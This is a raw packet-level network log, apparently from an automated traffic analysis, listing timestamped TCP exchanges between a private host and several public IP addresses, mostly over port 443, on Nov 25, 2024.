                                                                                                                    Nov 25, 2024 19:52:26.548125029 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.548168898 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.548175097 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.551300049 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.551348925 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.551353931 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.552875996 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.552922964 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.552927971 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.554501057 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.554577112 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.554630041 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.554635048 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.556915045 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.556919098 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.562854052 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.562896967 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.562901974 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.563693047 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.563739061 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.563744068 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.564976931 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.565023899 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.565028906 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.572932005 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.572999954 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.573086023 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.573091030 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.574146986 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.574151039 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.575351954 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.575408936 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.575413942 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.593401909 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.593564987 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.593569994 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.595236063 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.595283985 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.595288992 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.596878052 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.596923113 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.596926928 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.596951008 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.597003937 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.597259998 CET49773443192.168.2.4142.250.181.78
                                                                                                                    Nov 25, 2024 19:52:26.597274065 CET44349773142.250.181.78192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.644799948 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.645384073 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.645394087 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.645921946 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.645989895 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.646918058 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.646966934 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.647102118 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.647178888 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.647236109 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.647241116 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.647268057 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.647303104 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:26.694911957 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:26.831113100 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:26.871326923 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.193759918 CET44349776172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.195625067 CET44349776172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.195679903 CET49776443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:27.196521997 CET49776443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:27.196533918 CET44349776172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.346761942 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:27.346779108 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.346873999 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:27.347110033 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:27.347119093 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420566082 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420588017 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420594931 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420603037 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420617104 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420670986 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:27.420680046 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.420721054 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:27.439860106 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.439919949 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:27.439924955 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.439934969 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.439975977 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:27.473500013 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.477132082 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.477200985 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:27.478388071 CET49778443192.168.2.4172.217.19.206
                                                                                                                    Nov 25, 2024 19:52:27.478401899 CET44349778172.217.19.206192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:28.712047100 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:28.712088108 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:28.712102890 CET49775443192.168.2.452.149.20.212
                                                                                                                    Nov 25, 2024 19:52:28.712110043 CET4434977552.149.20.212192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.088413954 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.088697910 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.088720083 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.089037895 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.089104891 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.089644909 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.089684963 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.089911938 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.089963913 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.090085983 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.131335020 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.133553982 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.133559942 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.180471897 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.936357975 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.936383009 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.936495066 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.936510086 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.937413931 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.937444925 CET44349783172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.937494993 CET49783443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.938075066 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.938162088 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.938229084 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.938508987 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:29.938544035 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:30.961220980 CET4972380192.168.2.42.20.68.201
                                                                                                                    Nov 25, 2024 19:52:31.088980913 CET80497232.20.68.201192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.089039087 CET4972380192.168.2.42.20.68.201
                                                                                                                    Nov 25, 2024 19:52:31.692487001 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.693097115 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:31.693172932 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.693507910 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.693598986 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:31.694097996 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.694174051 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:31.694302082 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:31.694365978 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.694427967 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:31.694444895 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:31.742021084 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:32.550443888 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:32.550467968 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:32.550544977 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:32.550580978 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:32.551289082 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:32.551340103 CET44349788172.217.19.238192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:32.551392078 CET49788443192.168.2.4172.217.19.238
                                                                                                                    Nov 25, 2024 19:52:33.150930882 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.150965929 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:33.151160955 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.151695013 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.151731014 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:33.151783943 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.152276993 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.152288914 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:33.152427912 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:33.152439117 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.890170097 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.890597105 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:34.890619040 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.890872955 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.891180038 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:34.891231060 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.891330004 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:34.937344074 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.937700033 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:34.937722921 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.938004017 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.938317060 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:34.938369989 CET44349792216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.939327002 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:34.978300095 CET49792443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:35.757617950 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:35.758019924 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:35.758085012 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:35.770783901 CET49791443192.168.2.4216.58.208.228
                                                                                                                    Nov 25, 2024 19:52:35.770797014 CET44349791216.58.208.228192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:36.129287958 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.129412889 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:36.129730940 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.130120039 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.130146980 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:36.130198956 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.130631924 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.130671978 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:36.131007910 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:36.131020069 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.428141117 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.428381920 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.428394079 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.429250002 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.429307938 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.430425882 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.430475950 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.430512905 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.430525064 CET44349795104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.430614948 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.430614948 CET49795443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.431051970 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.431076050 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.431241989 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.431252003 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.431281090 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.431441069 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.431452036 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.432177067 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.432238102 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433042049 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433078051 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433114052 CET44349794104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.433120012 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433165073 CET49794443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433362007 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433383942 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:37.433445930 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433629036 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:37.433640003 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.749855995 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.750145912 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.750160933 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.751247883 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.751492023 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.751954079 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.752322912 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.752342939 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.752650976 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.752650976 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.752662897 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.752701044 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.753201962 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.753262997 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.754144907 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.754195929 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.803962946 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.803971052 CET44349797104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.803986073 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.803993940 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:38.850398064 CET49797443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:38.850552082 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.503133059 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503700972 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503739119 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503763914 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.503782034 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503809929 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503825903 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.503832102 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.503870010 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.512499094 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.521167040 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.521213055 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.521220922 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.529921055 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.529973984 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.529980898 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.574237108 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.628983974 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.670927048 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.713499069 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.716065884 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.716124058 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.716131926 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.724541903 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.724590063 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.724598885 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.741447926 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.741503000 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.741509914 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.750672102 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.750694036 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.750720024 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.750726938 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.750767946 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.758306026 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.766921997 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.766978979 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.766984940 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.775501013 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.775568962 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.775573969 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.783015013 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.783061981 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.783067942 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.792114019 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.792159081 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.792165041 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.804866076 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.804910898 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.804917097 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.855267048 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.855272055 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.902246952 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.924221039 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.927922010 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.927970886 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.927977085 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.935477972 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.935534954 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.935542107 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.942795992 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.942867994 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.942873001 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.957647085 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.957705021 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.957710028 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.957789898 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.972359896 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.972368002 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.972421885 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.979827881 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.979835033 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.979883909 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.990828037 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.990834951 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.990880966 CET49796443192.168.2.4104.21.68.132
                                                                                                                    Nov 25, 2024 19:52:39.990885973 CET44349796104.21.68.132192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.990930080 CET49796443192.168.2.4104.21.68.132
